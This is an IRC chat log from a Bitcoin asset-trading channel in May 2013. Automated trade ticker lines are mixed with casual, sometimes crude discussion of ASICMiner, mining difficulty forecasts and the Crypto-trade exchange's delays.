9 @ 0.024145 = 0.2173 BTC [-] May 25 18:34:55 to be clear, May 25 18:35:06 i'm not saying mp turned me skeptical on AM May 25 18:35:21 he merely helped me clarify my desires for them as a company May 25 18:35:39 I was already caring less about the growth of their mining farm May 25 18:35:48 but now i dont care about it at all May 25 18:36:18 selling hardware at the highest quantity and cheaper than competitors is the real cashcow May 25 18:36:24 and if they plan to exist long term May 25 18:36:33 they need to plan to capitilize on that May 25 18:36:45 and then make a jump to a tertiary market May 25 18:37:28 yep, and then when BFL or womever does ship May 25 18:37:34 AM can just sell for 10% less than them May 25 18:37:36 and rape May 25 18:39:11 [BTCTC] [ASICMINER-PT] 1 @ 2.4072 BTC [+] May 25 18:39:15 [BTCTC] [ASICMINER-PT] 1 @ 2.407 BTC [-] May 25 18:41:20 [BTCTC] [PAJKA.BOND] 1 @ 0.10997 BTC [-] May 25 18:43:25 who runs BFL btw May 25 18:44:41 i think he's a convicted criminal actually May 25 18:44:46 i forget the name May 25 18:44:48 some scammer May 25 18:48:43 LOL May 25 18:49:17 [MPEX] [S.MPOE] 6000 @ 0.00075421 = 4.5253 BTC [-] May 25 18:51:03 [MPEX] [S.DICE] 1800 @ 0.00251225 = 4.5221 BTC [-] May 25 18:51:13 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [+] May 25 18:51:17 https://bitcointalk.org/index.php?topic=110805.0 May 25 18:51:21 quite May 25 18:54:56 http://perfectmoney.com/news_view.html?id=342&drgn=1 May 25 18:54:56 Perfect Money no longer supporting US customers May 25 18:55:03 [HAVELOCK] [ASICM] 2 @ 0.02450001 = 0.049 BTC [-] May 25 18:55:03 [HAVELOCK] [ASICM] 6 @ 0.02450001 = 0.147 BTC [-] May 25 18:55:51 it's not that perfect it would seem May 25 18:56:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.02435 = 0.1218 BTC [+] May 25 18:56:41 YEEEEOOWWWW May 25 18:57:26 fuck em anyway, charging 6%, what is that May 25 19:00:01 [HAVELOCK] [ASICM] 200 @ 0.0245 = 4.9 BTC [-] May 25 19:05:01 [HAVELOCK] [ASICM] 4 @ 0.0245 = 0.098 BTC [-] May 25 19:06:34 [MPEX] [S.MPOE] 100 @ 0.00075421 = 0.0754 BTC [-] May 25 19:06:36 [MPEX] [S.MPOE] 9900 @ 0.00075268 = 7.4515 BTC [-] May 25 19:07:02 [HAVELOCK] [ASICM] 33 @ 0.02432 = 0.8026 BTC [-] May 25 19:07:16 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [+] May 25 19:08:01 [HAVELOCK] [ASICM] 1 @ 0.02431 BTC [-] May 25 19:08:03 [HAVELOCK] [ASICM] 460 @ 0.0242 = 11.132 BTC [-] May 25 19:08:04 [MPEX] [S.DICE] 2096 @ 0.00251225 = 5.2657 BTC [-] May 25 19:08:05 [HAVELOCK] [ASICM] 99 @ 0.0242 = 2.3958 BTC [-] May 25 19:09:02 [HAVELOCK] [ASICM] 1 @ 0.0242 BTC [-] May 25 19:12:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.02415 = 0.0966 BTC [-] May 25 19:13:01 [HAVELOCK] [ASICM] 21 @ 0.0245 = 0.5145 BTC [+] May 25 19:13:32 [BTCTC] [TAT.ASICMINER] 26 @ 0.024145 = 0.6278 BTC [-] May 25 19:14:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.02412 = 0.2412 BTC [-] May 25 19:14:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.02412 = 0.1206 BTC [-] May 25 19:14:47 [BTCTC] [TAT.ASICMINER] 17 @ 0.0241 = 0.4097 BTC [-] May 25 19:24:59 [BTCTC] [ASICMINER-PT] 1 @ 2.4385 BTC [+] May 25 19:28:21 [BTCTC] [ASICMINER-PT] 1 @ 2.4448 BTC [+] May 25 19:40:53 [BTCTC] [TAT.ASICMINER] 45 @ 0.0243 = 1.0935 BTC [+] May 25 19:52:42 ;;bids 0 May 25 19:52:43 There are currently 13709258 bitcoins demanded at or over 0.0 USD, worth 18594766.4567 USD in total. | Data vintage: 18.2833 seconds May 25 19:52:49 ;;asks 111111111111111111 May 25 19:52:50 There are currently 104685.69 bitcoins offered at or under 1.11111111111e+17 USD, worth 6.99157250609e+13 USD in total. | Data vintage: 25.4900 seconds May 25 19:54:30 ;;eightball good time to sell ? May 25 19:54:30 NO. May 25 19:54:33 http://www.ticotimes.net/More-news/News-Briefs/Costa-Rican-arrested-in-Spain-for-alleged-financial-crimes_Friday-May-24-2013 May 25 19:54:37 ;;next May 25 19:54:38 targets: 140-145, 160-166, 178-188 | support: 128-130 | #bitcoin [Fri, 24 May 2013 18:24:11 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 22 hours, 30 minutes, and 27 seconds ago May 25 19:55:12 ;;eightball invest more in asicminer? May 25 19:55:12 NO. May 25 19:55:28 ;;eightball time to short AM ? May 25 19:55:28 Obviously. May 25 19:55:34 ;;eightball sex with sister? May 25 19:55:34 No chance. May 25 19:55:38 damn May 25 19:55:50 ;;eightball sex with sister? May 25 19:55:51 You're kidding, right? May 25 19:56:04 well, it's random right? May 25 19:56:06 aknap3: no luck May 25 19:56:18 no, its gribble May 25 19:56:25 aknap3: maybe maybe not... May 25 19:56:32 ;;eightball sex with myself? May 25 19:56:32 No chance. May 25 19:56:35 whew May 25 19:56:39 the ghost of satoshi is on gribble May 25 19:56:54 kakobreka : yes, drama of the day :) May 25 19:57:23 ;;eightball LR is down, it's good for BTC ? May 25 19:57:23 NO. May 25 19:57:37 gribble u mad. May 25 19:57:57 yep, is mad ! so eric you still have a chance May 25 20:01:02 [BTCTC] [PAJKA.BOND] 1 @ 0.1075 BTC [-] May 25 20:01:42 [BTCTC] [PAJKA.BOND] 1 @ 0.1072 BTC [-] May 25 20:03:01 [HAVELOCK] [ASICM] 27 @ 0.0245 = 0.6615 BTC [+] May 25 20:03:02 [HAVELOCK] [ASICM] 9 @ 0.02450001 = 0.2205 BTC [+] May 25 20:03:04 [HAVELOCK] [ASICM] 329 @ 0.0249 = 8.1921 BTC [+] May 25 20:05:02 [HAVELOCK] [ASICM] 36 @ 0.0249 = 0.8964 BTC [+] May 25 20:08:21 ;;slap gribble May 25 20:12:02 [BTCTC] [ESECURITYSABTC] 1 @ 0.262 BTC [-] May 25 20:13:17 Chaaang-Noi, where do you pick up cog shares? May 25 20:16:04 i dunno, i figure it's the ltc of mining, but I was gonna take a look May 25 20:16:17 [BTCTC] [TAT.ASICMINER] 58 @ 0.0241 = 1.3978 BTC [-] May 25 20:16:22 [BTCTC] [TAT.ASICMINER] 25 @ 0.0241 = 0.6025 BTC [-] May 25 20:17:12 [BTCTC] [ASICMINER-PT] 1 @ 2.435 BTC [-] May 25 20:17:20 [BTCTC] [TAT.ASICMINER] 41 @ 0.02405 = 0.9861 BTC [-] May 25 20:17:56 [BTCTC] [TAT.ASICMINER] 100 @ 0.0242 = 2.42 BTC [+] May 25 20:17:58 [BTCTC] [TAT.ASICMINER] 100 @ 0.02425 = 2.425 BTC [+] May 25 20:18:05 [BTCTC] [TAT.ASICMINER] 100 @ 0.0243 = 2.43 BTC [+] May 25 20:18:54 [BTCTC] [CRYPTO-TRADE] 2 @ 0.199 = 0.398 BTC [+] May 25 20:20:21 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [+] May 25 20:23:01 [HAVELOCK] [ASICM] 18 @ 0.02425 = 0.4365 BTC [-] May 25 20:23:15 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] May 25 20:23:18 [BTCTC] [ASICMINER-PT] 1 @ 2.435 BTC [+] May 25 20:23:20 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [+] May 25 20:23:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02405 BTC [-] May 25 20:24:01 [HAVELOCK] [ASICM] 4 @ 0.02425 = 0.097 BTC [-] May 25 20:24:10 [BTCTC] [ASICMINER-PT] 1 @ 2.445 BTC [+] May 25 20:26:18 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] May 25 20:30:18 I need to be proven wrong again... Give me your best estimate on network increase (in percent) per month over the next 12 months on average. May 25 20:31:30 impossible May 25 20:31:48 there is no way to give a good estimate May 25 20:31:53 Impossibe to give me your best? May 25 20:32:03 best would still be bad May 25 20:32:08 as in useless May 25 20:32:18 Did I say I wanted your best or good? May 25 20:32:36 ok, 10% per diff change May 25 20:32:54 We know it's not going to be 10000% or 1% so it's somewhere in between. May 25 20:33:02 thats my best guess May 25 20:34:05 that gives you an easy number to make a formula with too May 25 20:34:29 And is that just a complete random number or do you think it is based on at least some rational thought? May 25 20:34:47 Not looking for formulas right now, and difficulty really isn't part of that equation at all :-) May 25 20:35:03 i think we've been getting closer to 10% per May 25 20:35:14 ;;estimate May 25 20:35:16 Next difficulty estimate | 13355540.2437 based on data since last change | 12915952.6158 based on data for last three days May 25 20:35:16 and that it we might see some weeks where its more May 25 20:35:26 ;;nethash May 25 20:35:26 92457.4009239 May 25 20:36:47 Sure, and some weeks, it may be a bit lower, but doesn't really matter, I'm just picking some random scenarios for an article. May 25 20:37:07 [BTCTC] [ASICMINER-PT] 1 @ 2.42 BTC [-] May 25 20:37:10 even better reason to use 10%per then May 25 20:37:15 so readers can grasp it May 25 20:37:44 Actually, since 10% means 20% per month, 5% would be better, but I don't want to be too unrealistic. May 25 20:38:37 What was the previous increase btc? Just to have as a point of reference... May 25 20:38:51 rephrase? May 25 20:38:52 *btw, not btc May 25 20:39:03 it was 10%+ i think May 25 20:39:09 How much of an increase was the last retarget in percent? May 25 20:39:16 like about 11% if i recall May 25 20:39:22 ;;bc,stats May 25 20:39:22 Ah, OK, I'll check it out. May 25 20:39:23 Current Blocks: 237893 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 2010 blocks | Next Difficulty In About: 1 week, 4 days, 14 hours, 50 minutes, and 38 seconds | Next Difficulty Estimate: 13355540.2437 | Estimated Percent Change: 9.89128 May 25 20:39:24 [BTCTC] [TAT.ASICMINER] 9 @ 0.02405 = 0.2165 BTC [-] May 25 20:39:27 [BTCTC] [TAT.ASICMINER] 89 @ 0.02401 = 2.1369 BTC [-] May 25 20:39:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [-] May 25 20:39:39 10% per is a good guess methinks May 25 20:39:56 [BTCTC] [ASICMINER-PT] 1 @ 2.415 BTC [-] May 25 20:41:10 A bit lower, actually: http://log.bitcoin-assets.com/?date=24-05-2013#54044 <- Aronud 7.6% May 25 20:41:40 afk May 25 20:43:13 [BTCTC] [ASICMINER-PT] 1 @ 2.412 BTC [-] May 25 20:43:15 [BTCTC] [ASICMINER-PT] 2 @ 2.411003 = 4.822 BTC [-] May 25 20:43:17 [BTCTC] [ASICMINER-PT] 1 @ 2.40782 BTC [-] May 25 20:43:20 [BTCTC] [ASICMINER-PT] 2 @ 2.40782 = 4.8156 BTC [-] May 25 20:43:22 [BTCTC] [ASICMINER-PT] 1 @ 2.4077 BTC [-] May 25 20:48:58 [MPEX] [S.MPOE] 100 @ 0.00075389 = 0.0754 BTC [+] May 25 20:50:39 [MPEX] [S.MPOE] 1210 @ 0.00075389 = 0.9122 BTC [+] May 25 21:02:10 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] May 25 21:10:50 [BTCTC] [TAT.ASICMINER] 19 @ 0.0244 = 0.4636 BTC [+] May 25 21:11:19 Didn't I read that ASICMiner can put 1TH online for around $10K? May 25 21:14:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.0244 = 0.1464 BTC [+] May 25 21:18:32 why would they do that if they are selling 10GH/s miners for $5k? May 25 21:19:13 They're only abale to do that because nobody else is shipping. Will you still pay $5K for a 10GH/s in one year? May 25 21:19:46 no, i wouldnt even do that today May 25 21:20:12 Right. So either they stop mining or they pay some sum of money per TH, and I believe that number to be $10K. May 25 21:21:06 I just need a number to illustrate reinvestment cost to maintain hashrate, but my Google-foo couldn't find a friedcat mention of that number. May 25 21:21:12 It's not terribly important, though. May 25 21:22:21 [MPEX] [S.MPOE] 2150 @ 0.00075389 = 1.6209 BTC [+] May 25 21:29:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.02401 = 0.2401 BTC [-] May 25 21:29:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.024006 = 0.12 BTC [-] May 25 21:29:03 [BTCTC] [TAT.ASICMINER] 11 @ 0.024005 = 0.2641 BTC [-] May 25 21:29:56 topace: does havelock have a (pull) API? May 25 21:30:16 !e May 25 22:07:12 anyone got an email by crypto-trade? May 25 22:10:46 [BTCTC] [ASICMINER-PT] 1 @ 2.409 BTC [+] May 25 22:13:32 [BTCTC] [ASICMINER-PT] 1 @ 2.409 BTC [+] May 25 22:14:22 I got an email from them May 25 22:14:26 with this inside May 25 22:14:26 http://24.media.tumblr.com/8ce5e54b96a4cd5bef94e80edd131d5d/tumblr_mj44lmV4LH1rv117wo1_500.gif May 25 22:14:38 dunno what it means May 25 22:14:41 hahahaha May 25 22:15:17 :) May 25 22:15:23 perhaps haxed May 25 22:15:41 would be ironic May 25 22:16:26 im looking for an alternative to bitvps May 25 22:16:28 something reliable May 25 22:16:37 the hack won't come until after CT is live May 25 22:16:51 no point hacking yourself without taking some coins with you May 25 22:17:42 they are worse than bfl May 25 22:18:27 not quite May 25 22:21:53 [BTCTC] [B.YABMC] 97 @ 0.0151 = 1.4647 BTC [-] May 25 22:22:00 [BTCTC] [B.YABMC] 1 @ 0.015 BTC [-] May 25 22:22:04 [BTCTC] [B.YABMC] 1 @ 0.01392 BTC [-] May 25 22:22:09 [BTCTC] [B.YABMC] 10 @ 0.01361 = 0.1361 BTC [-] May 25 22:22:20 [BTCTC] [B.YABMC] 300 @ 0.013005 = 3.9015 BTC [-] May 25 22:22:22 [BTCTC] [B.YABMC] 50 @ 0.013004 = 0.6502 BTC [-] May 25 22:25:01 [HAVELOCK] [VTX] 1 @ 0.4399 BTC [+] May 25 22:26:01 [HAVELOCK] [ASICM] 4 @ 0.024749 = 0.099 BTC [+] May 25 22:49:12 Two hours left of the crypto-trade deadline... Which number is this, the sixth? May 25 22:53:58 [BTCTC] [ASICMINER-PT] 1 @ 2.4375 BTC [+] May 25 22:54:00 [BTCTC] [ASICMINER-PT] 1 @ 2.4377 BTC [+] May 25 22:55:51 [BTCTC] [TAT.ASICMINER] 4 @ 0.02434 = 0.0974 BTC [+] May 25 23:06:12 [BTCTC] [ASICMINER-PT] 1 @ 2.4375 BTC [-] May 25 23:07:26 [BTCTC] [ASICMINER-PT] 1 @ 2.4375 BTC [-] May 25 23:07:27 [BTCTC] [ASICMINER-PT] 9 @ 2.4377 = 21.9393 BTC [+] May 25 23:07:29 [BTCTC] [ASICMINER-PT] 1 @ 2.4399 BTC [+] May 25 23:07:31 [BTCTC] [ASICMINER-PT] 27 @ 2.44 = 65.88 BTC [+] May 25 23:13:31 O_o May 25 23:24:20 [BTCTC] [BASIC-MINING] 10 @ 0.54551 = 5.4551 BTC [-] May 25 23:24:23 [BTCTC] [BASIC-MINING] 11 @ 0.54551 = 6.0006 BTC [-] May 25 23:24:25 [BTCTC] [BASIC-MINING] 1 @ 0.5455 BTC [-] May 25 23:24:27 [BTCTC] [BASIC-MINING] 2 @ 0.5452 = 1.0904 BTC [-] May 25 23:26:06 !help May 25 23:26:07 List of commands: May 25 23:26:08 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} May 25 23:26:09 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} May 25 23:26:10 !mp (desc: returns the response from MPEX order) May 25 23:26:11 !rules (desc: chan guidelines) {short: !r} May 25 23:26:12 !exchanges (desc: lists exchanges and brokers) {short: !e} May 25 23:28:21 [BTCTC] [ASICMINER-PT] 1 @ 2.4349 BTC [-] May 25 23:28:26 [BTCTC] [ASICMINER-PT] 4 @ 2.435 = 9.74 BTC [+] May 25 23:30:01 [HAVELOCK] [ASICM] 29 @ 0.024749 = 0.7177 BTC [+] May 25 23:30:14 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [+] May 25 23:31:32 [BTCTC] [S.DICE-PT] 3 @ 0.00335 = 0.0101 BTC [+] May 25 23:39:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02434 BTC [+] May 25 23:39:41 [MPEX] [S.MPOE] 100 @ 0.00075268 = 0.0753 BTC [-] May 25 23:39:43 [MPEX] [S.MPOE] 9500 @ 0.00075266 = 7.1503 BTC [-] May 25 23:43:06 [BTCTC] [ASICMINER-PT] 1 @ 2.435 BTC [+] May 25 23:47:19 [BTCTC] [BASIC-MINING] 1 @ 0.567999 BTC [+] May 25 23:47:45 [BTCTC] [ASICMINER-PT] 1 @ 2.4091 BTC [-] May 25 23:47:47 [BTCTC] [ASICMINER-PT] 17 @ 2.409 = 40.953 BTC [-] May 25 23:48:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.02435 = 0.2435 BTC [+] May 25 23:50:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.02439 BTC [+] May 25 23:52:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.02439 BTC [+] May 25 23:53:48 [BTCTC] [TAT.ASICMINER] 14 @ 0.02439 = 0.3415 BTC [+] May 26 00:01:55 [BTCTC] [CRYPTO-TRADE] 4 @ 0.199 = 0.796 BTC [+] May 26 00:02:55 [BTCTC] [CRYPTO-TRADE] 9 @ 0.1999 = 1.7991 BTC [+] May 26 00:03:19 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199998 BTC [+] May 26 00:04:25 [BTCTC] [S.DICE-PT] 31 @ 0.00335 = 0.1039 BTC [+] May 26 00:05:40 [MPEX] [S.MPOE] 1900 @ 0.00075266 = 1.4301 BTC [-] May 26 00:05:42 [MPEX] [S.MPOE] 1063 @ 0.00075255 = 0.8 BTC [-] May 26 00:06:26 [BTCTC] [TAT.ASICMINER] 6 @ 0.02439 = 0.1463 BTC [+] May 26 00:08:15 $avg May 26 00:08:16 deadweasel: 130.00 May 26 00:09:02 [MPEX] [S.MPOE] 7100 @ 0.00075201 = 5.3393 BTC [-] May 26 00:10:00 [MPEX] [S.MPOE] 6300 @ 0.00075155 = 4.7348 BTC [-] May 26 00:19:24 [BTCTC] [CRYPTO-TRADE] 2 @ 0.199999 = 0.4 BTC [+] May 26 00:19:43 [BTCTC] [CRYPTO-TRADE] 13 @ 0.2 = 2.6 BTC [+] May 26 00:20:01 [HAVELOCK] [ASICM] 9 @ 0.02475 = 0.2228 BTC [+] May 26 00:22:00 [HAVELOCK] [ASICM] 1 @ 0.02475 BTC [+] May 26 00:32:01 [HAVELOCK] [ASICM] 21 @ 0.0248 = 0.5208 BTC [+] May 26 00:32:02 [HAVELOCK] [ASICM] 5 @ 0.0248 = 0.124 BTC [+] May 26 00:36:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.02439 = 0.0732 BTC [+] May 26 00:39:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.0244 = 0.122 BTC [+] May 26 00:40:00 [HAVELOCK] [ASICM] 474 @ 0.0248 = 11.7552 BTC [+] May 26 00:40:52 [BTCTC] [ASICMINER-PT] 1 @ 2.4101 BTC [+] May 26 00:40:54 [BTCTC] [ASICMINER-PT] 5 @ 2.41 = 12.05 BTC [-] May 26 00:41:32 [BTCTC] [ASICMINER-PT] 1 @ 2.425 BTC [+] May 26 00:44:01 [HAVELOCK] [ASICM] 131 @ 0.0248 = 3.2488 BTC [+] May 26 00:45:49 http://coin.furuknap.net/can-100th-really-be-the-next-asicminer/ <- Again a somewhat simplified analysis. Take it for what it's worth. May 26 00:48:37 [BTCTC] [BASIC-MINING] 1 @ 0.567999 BTC [+] May 26 00:50:01 [HAVELOCK] [ASICM] 170 @ 0.02485 = 4.2245 BTC [+] May 26 00:50:33 [BTCTC] [ASICMINER-PT] 1 @ 2.4347 BTC [+] May 26 00:51:01 [HAVELOCK] [ASICM] 500 @ 0.0249 = 12.45 BTC [+] May 26 00:51:54 [BTCTC] [ASICMINER-PT] 1 @ 2.4347 BTC [+] May 26 00:51:55 [BTCTC] [ASICMINER-PT] 4 @ 2.4348 = 9.7392 BTC [+] May 26 00:52:00 [HAVELOCK] [ASICM] 600 @ 0.02491 = 14.946 BTC [+] May 26 00:52:47 [BTCTC] [ASICMINER-PT] 6 @ 2.4348 = 14.6088 BTC [+] May 26 00:53:00 [HAVELOCK] [ASICM] 485 @ 0.02494 = 12.0959 BTC [+] May 26 00:53:45 [BTCTC] [ASICMINER-PT] 5 @ 2.435 = 12.175 BTC [+] May 26 00:54:00 [HAVELOCK] [ASICM] 252 @ 0.02492 = 6.2798 BTC [-] May 26 00:54:38 [BTCTC] [ASICMINER-PT] 2 @ 2.435 = 4.87 BTC [+] May 26 01:00:45 neotrix failed again May 26 01:02:08 furuknap, the 3.3 sale was a glitch May 26 01:02:17 i think 3.0 was the peak May 26 01:05:00 [HAVELOCK] [ASICM] 7 @ 0.0249 = 0.1743 BTC [-] May 26 01:05:48 [BTCTC] [ASICMINER-PT] 8 @ 2.435 = 19.48 BTC [+] May 26 01:07:47 furuknap, while you mentioned repeatedly in text that AM sells hardware and 100TH bonds do not have that benefit, you exclude hardware sales from your outlook numbers. This is misleading, no? May 26 01:07:58 people will gloss over your walls of text May 26 01:08:03 No, it's explained just befoire the numbers. May 26 01:08:05 and start making assumptions May 26 01:08:17 I can't control what people do. I can only give them the numbers. May 26 01:08:19 you should disclaim within the numbers too May 26 01:08:34 [BTCTC] [TAT.ASICMINER] 15 @ 0.0244 = 0.366 BTC [+] May 26 01:08:36 Good point, I'll add a reminder. May 26 01:08:37 because you also argue that the stock of 100TH would be very profitable May 26 01:08:53 yet you dont prove whther it is actually MORE profitable than AM May 26 01:09:16 The answer is: it depends :-) May 26 01:09:51 It is more profitable in a two-year timeframe with all the assumptions coming true. If any of them don't then all hell breaks loose... May 26 01:09:54 or, it's unlikely May 26 01:10:03 2years from now May 26 01:10:14 a mining bond will be potentially worthless May 26 01:10:43 likely worthless May 26 01:10:59 Not according to the numbers I've run. In 2 years, the bond will have repaid itself many times over and still produce small (ie above US Treasury, but just barely) profits. May 26 01:11:09 lmfao May 26 01:11:11 https://crypto-trade.com/splash/ May 26 01:11:13 what day is it May 26 01:11:18 you estimated 10% diff increase per month May 26 01:11:22 isnt that a bit modest? May 26 01:11:25 (rhetorical question) May 26 01:11:28 I used your 20%. May 26 01:12:13 i said 10% per diff May 26 01:12:21 Which is 20% per month, no? May 26 01:12:27 there are more than 2 diff change per month May 26 01:12:36 at 10% increase May 26 01:12:41 ;;bc,stats May 26 01:12:43 Current Blocks: 237919 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 1984 blocks | Next Difficulty In About: 1 week, 4 days, 14 hours, 27 minutes, and 22 seconds | Next Difficulty Estimate: 11618514.1606 | Estimated Percent Change: -4.40121 May 26 01:12:52 see May 26 01:12:54 ;;nethash May 26 01:12:57 93661.214259 May 26 01:13:01 ;;prevdiff May 26 01:13:03 11187257.4614 May 26 01:13:07 Cool, I'll recalculate with -4.4 instead. We'll be rich in a few days. May 26 01:13:09 :-) May 26 01:13:13 lol May 26 01:13:25 the estimate is skewed the first few days May 26 01:13:29 not enough data May 26 01:13:35 I know... May 26 01:13:49 more imporatnly, not that it just changed May 26 01:13:57 yet says the next diff will be in 11 days May 26 01:14:07 note* May 26 01:14:33 thats why i said you'd need a formula May 26 01:14:55 The difficulty changes every 2016 blocks, no? May 26 01:15:30 2016/(6*24)=14 days. May 26 01:15:51 So yeah, there are a few percents off. May 26 01:16:08 would be nice if there was per thread ignore on shitcointalk May 26 01:16:21 I'm going to end up with everyone ignored at this rate May 26 01:16:22 Still, 20% is quite high and likley not sustainable. May 26 01:16:40 trying to keep up with actual AM updates May 26 01:16:46 http://www.fool.com/fool/free-report/15/rb-jeremy-speaks-297063.aspx?aid=5468&source=erbasltxt0860008 May 26 01:16:52 jesus, thats desperate May 26 01:17:24 ick May 26 01:19:16 http://spectrum.ieee.org/tech-talk/computing/networks/bitcoin-atm-robocoin-makes-money-laundering-easy May 26 01:19:24 ^ what a horrific headline May 26 01:20:01 [HAVELOCK] [ASICM] 20 @ 0.0249 = 0.498 BTC [-] May 26 01:20:36 Note: Please remember that these numbers carry with them certain assumptions. These assumptions may or may not hold true, but are required to make any analysis possible. Make sure you evaluate the assumptions and whether they fit your own research. May 26 01:20:44 ^^^ Works for you, TAT? May 26 01:26:00 [HAVELOCK] [ASICM] 1 @ 0.0244 BTC [-] May 26 01:28:25 your blog not mine ;) May 26 01:28:36 I'm less verbose than some May 26 01:29:06 Well, disclaimer added, for what it's worth. May 26 01:29:16 [BTCTC] [ASICMINER-PT] 1 @ 2.4399 BTC [+] May 26 01:36:03 [HAVELOCK] [ASICM] 25 @ 0.0249 = 0.6225 BTC [+] May 26 01:37:00 [HAVELOCK] [SDICE] 1 @ 0.2447 BTC [+] May 26 01:37:03 ThickAsThieves: what does smiguel mean by this "Blockchain.info network percentage * total network hashrate" May 26 01:38:09 i think i need mre context May 26 01:38:40 ooooh, i think he means this http://blockchain.info/pools May 26 01:39:11 ThickAsThieves: he pmmed me (not sure if he copied you on it), and he says he gets the solomining rate that way May 26 01:39:46 it fits May 26 01:42:59 you could probably track their solved block too May 26 01:43:09 blocks* May 26 01:43:39 do all of the pools they use have n API? May 26 01:45:00 hard to estimate hashrate from solved blocks May 26 01:45:17 erm, im assuming they do, at the very least it must be possible to parse May 26 01:47:58 yeah btcguild has one May 26 01:51:41 [BTCTC] [ASICMINER-PT] 3 @ 2.4399 = 7.3197 BTC [+] May 26 01:53:09 [BTCTC] [TAT.ASICMINER] 6 @ 0.02459 = 0.1475 BTC [+] May 26 01:53:54 [00:45] hard to estimate hashrate from solved blocks <- Just make something up. That seems to be the way most others do it. May 26 01:54:56 LOL May 26 01:55:18 surely you can get a reliable formula May 26 01:55:26 its pretty darn impressive tho, that there is a long sequence of blocks solved by ASICminer themselves May 26 01:55:29 it wuld just be off by luck May 26 01:55:57 If you're lucky, of course. May 26 01:56:05 ThickAsThieves: so +/- 100%? May 26 01:56:10 ;;estimate May 26 01:56:11 Next difficulty estimate | 12157712.0899 based on data since last change | 13059194.2661 based on data for last three days May 26 01:56:19 Approximately :-) May 26 01:56:25 ;;bc,stats May 26 01:56:27 Current Blocks: 237925 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 1978 blocks | Next Difficulty In About: 1 week, 4 days, 20 hours, 15 minutes, and 48 seconds | Next Difficulty Estimate: 12157712.0899 | Estimated Percent Change: 0.03538 May 26 01:56:37 [BTCTC] [ASICMINER-PT] 5 @ 2.4399 = 12.1995 BTC [+] May 26 01:57:35 OMG, it's up from -4.4 to 0.03 in just 30 minutes. At this rate, it will be 7905 PH/s in a year! We're all gonna die! May 26 01:57:48 dat extrapolation May 26 01:57:57 lies, damned lies May 26 01:58:03 and difficulty predictions May 26 01:58:05 It's not a lie if I believe it! May 26 01:58:09 :-) May 26 01:58:27 http://en.wikipedia.org/wiki/Lies,_damned_lies,_and_statistics May 26 01:58:35 jurov: u might be in for a rough ride May 26 01:58:41 the july one, june ur fine May 26 01:59:17 i'll prolly scam TAT then... he has too much money already :P May 26 01:59:21 lmfao May 26 01:59:29 Damn, I want to short some shares that aren't shortable. May 26 01:59:42 you alredy got my money May 26 02:00:12 yes, but you expect me to give you more back... if diff goes over 19m May 26 02:00:21 indeed May 26 02:00:24 Crypto-trade extended deadline by two hours. One hour left. May 26 02:00:58 lol May 26 02:02:58 Why to tech people handle business stuff? They wouldn't want a BA to come in to their data center and start mucking around. Why do they assume that it's OK for them to try it at business? May 26 02:03:13 this is bitcoin May 26 02:03:17 because business is common sense May 26 02:03:20 It's not Bitcoin, it's everywhere. May 26 02:03:44 "Yeah, but we gots skillz". No you don't. You're trained monkeys, just like me. We suck at business and need extensive training to succeed. May 26 02:03:45 there are tech people who are colossal morons however May 26 02:09:29 we know we're morons May 26 02:09:33 proudly May 26 02:09:58 im the biggest one there is May 26 02:10:12 hey i found crypto-trade's new slogan http://cdn0.nflximg.net/images/1160/1641160.jpg May 26 02:10:58 "failure to fail" is better May 26 02:12:13 if this were the real world, their stock price would have plumetted three times over by now May 26 02:12:38 if this were the real world no one would have let them IPO May 26 02:12:43 but in this fairy tale land of cryptocoin, investors have one of two things May 26 02:12:49 infinite faith May 26 02:12:53 or infinite stupidity May 26 02:13:08 blind greed May 26 02:13:21 i havent sold my shares of crypto-coin, i wonder what that makes me May 26 02:13:27 er crypto-trade May 26 02:14:00 you can exchange them for my ziggap shares :) May 26 02:14:17 to diversify May 26 02:14:32 LMFAO May 26 02:14:39 :-D May 26 02:15:03 Yeah, I hold a few too. I have a nagging feeling this may be my first loss this month :-( May 26 02:15:49 Well, technically, I still had a few SDICE to unload at a slight loss, but I had written that off before the whole US thing burst. May 26 02:16:05 sell em and buy vtx May 26 02:16:21 on havelock May 26 02:16:40 much more likely to succeed than CT May 26 02:16:51 CT? May 26 02:17:07 yeah canadian gov says bitcoin exchanges are okay May 26 02:17:21 Yeah... Well, the problem is, I don't understand the exchange business much so I find it extremely hard to evaluate shares. I bought a few more in support of Neotrix than from a hope of profit. May 26 02:17:25 and virtex charges like 3% fees to start May 26 02:17:29 so they are making loot May 26 02:18:02 VTX is also a real world co May 26 02:19:45 23:17 < KingCoin> and virtex charges like 3% fees to start May 26 02:19:53 makes me wonder why people still use them? May 26 02:20:01 [HAVELOCK] [ASICM] 4 @ 0.024895 = 0.0996 BTC [-] 